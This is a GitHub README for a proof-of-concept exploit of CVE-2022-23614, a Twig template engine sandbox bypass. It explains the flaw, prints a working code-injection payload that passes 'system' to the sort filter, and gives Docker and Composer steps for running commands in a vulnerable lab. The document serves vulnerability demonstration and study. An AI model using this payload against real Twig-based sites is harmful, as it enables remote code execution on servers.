Skip to content

4rtamis/CVE-2022-23614

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

exploit

exploit

 
 

.gitignore

.gitignore

 
 

Dockerfile

Dockerfile

 
 

README.md

README.md

 
 

build-docker.sh

build-docker.sh

 
 

snapshot.list

snapshot.list

 
 

Repository files navigation

CVE-2022-23614

Proof of concept (PoC) for CVE-2022-23614 referenced in the DSA-5107-1.

  • CVSS-2.0: 7.5
  • CVSS-3.X: 9.8

Explanation

Twig is a flexible, fast, and secure template engine for PHP. Notably, it is possible to use filters in a template before rendering it. The sort filter can be used to sort the elements of an array with the following structure:

{{ [5,8,2,3]|sort('desc') }}

Twig has a sandbox mode to evaluate untrusted template code. When in this sandbox mode, the arrow parameter of the sort filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code.

{{ ["id",""]|sort('system') }}

Usage

This PoC illustrates the vulnerability in two different use cases: either using Debian php-twig (v2.14.1) package or using Composer twig/twig (v2.14) module.

The index.php file crafts a Twig template based on the first argument. In the following code, argv[1] is the name of the sorting function that will be used by Twig when rendering.

// index.php - line 28
$templateCode .= "{{ args|sort('" . $sortFunction . "') }}\n";

Then, index.php will use two deprecated functions of Twig to load the generated template. Eventually, it uses the second argument (argv[2]) to pass data to the template as it is being rendered, notably the args array that we want to sort.

// index.php - line 44
$renderedTemplate = $modifiedTemplate->render($arrayToSort);

The rendered template is then printed in the standard output.

Please note this repository was made for demonstration purposes only. It is meant to be simple to understand and easy to use in order to play with the CVE using only a command line interface. It is quite far from what one can find on an actual vulnerable server.

php-twig

Using Docker, we are able to recreate the context of the original Debian Security Advisory (DSA). You can use the given build-docker.sh script in order to properly build and run the vulnerable container.

chmod a+x build-docker.sh
./build-docker.sh

The container should shut down once the payload is executed (an id command). If you want to try your own commands, you can run the container in interactive mode:

docker build -t cve-2022-23614 .
docker run -it --rm cve-2022-23614 /bin/bash

Once in the container, you can craft your own payload using the following model:

php index.php system '{"args":["id",""]}'
                ^                 ^
          sorting function   array to sort

This dockerfile was partially created using DECRET.

Composer

If you have php and Composer already installed on your machine, you can replicate the exploit using the vulnerable Composer module.

cd exploit
composer install

Then you just have to play with the payload.

php index.php system '{"args":["id",""]}'

References

CVE details: https://nvd.nist.gov/vuln/detail/CVE-2022-23614

DSA: https://www.debian.org/security/2022/dsa-5107

Patch commit: https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9

PoC by davwwwx (using GUI): https://github.com/davwwwx/CVE-2022-23614

About

Proof of concept for CVE-2022-23614 (command injection in Twig)

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages